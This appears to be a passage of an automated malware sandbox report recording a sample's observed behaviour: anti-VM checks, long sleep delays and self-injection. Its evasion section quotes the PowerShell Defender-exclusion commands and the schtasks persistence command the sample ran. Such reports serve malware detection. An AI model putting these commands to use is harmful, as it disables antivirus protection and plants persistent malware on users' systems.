Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: 9nvo2o410p.exe PID: 8, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: FAwLPzxPWWF.exe PID: 7540, type: MEMORYSTR
Source: C:\Users\user\Desktop\9nvo2o410p.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\Desktop\9nvo2o410p.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9nvo2o410p.exe Memory allocated: 1670000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Memory allocated: 2E50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Memory allocated: 4E50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Memory allocated: 7DA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Memory allocated: 7830000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Memory allocated: 7DA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Memory allocated: 3020000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Memory allocated: 3260000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Memory allocated: 3070000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Memory allocated: 1320000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Memory allocated: 3100000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Memory allocated: 2E40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Memory allocated: 7750000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Memory allocated: 8750000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Memory allocated: 7750000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Memory allocated: 1330000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Memory allocated: 2CB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Memory allocated: 4CB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\9nvo2o410p.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8076 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 850 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7683 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1152 Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Window / User API: threadDelayed 2128 Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Window / User API: threadDelayed 3968 Jump to behavior
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Window / User API: threadDelayed 1565
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Window / User API: threadDelayed 7913
Source: C:\Users\user\Desktop\9nvo2o410p.exe TID: 4324 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304 Thread sleep count: 8076 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308 Thread sleep count: 850 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7456 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7496 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7424 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe TID: 7928 Thread sleep time: -20291418481080494s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe TID: 7524 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe TID: 7488 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe TID: 7704 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe TID: 8076 Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe TID: 7908 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe TID: 7884 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\9nvo2o410p.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\9nvo2o410p.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Thread delayed: delay time: 922337203685477
Source: 9nvo2o410p.exe, 00000000.00000002.1666134109.00000000011A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: FAwLPzxPWWF.exe, 0000000A.00000002.1715184147.00000000013D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}"
Source: FAwLPzxPWWF.exe, 00000010.00000002.1859987752.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 9nvo2o410p.exe, 00000008.00000002.1803946724.00000000015AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllcc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\9nvo2o410p.exe"
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe"
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\9nvo2o410p.exe" Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe" Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Memory written: C:\Users\user\Desktop\9nvo2o410p.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\9nvo2o410p.exe" Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe" Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FAwLPzxPWWF" /XML "C:\Users\user\AppData\Local\Temp\tmp4717.tmp" Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Users\user\Desktop\9nvo2o410p.exe "C:\Users\user\Desktop\9nvo2o410p.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FAwLPzxPWWF" /XML "C:\Users\user\AppData\Local\Temp\tmp586C.tmp"
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process created: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe "C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe"
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process created: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe "C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe"
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Process created: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe "C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe"
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Users\user\Desktop\9nvo2o410p.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
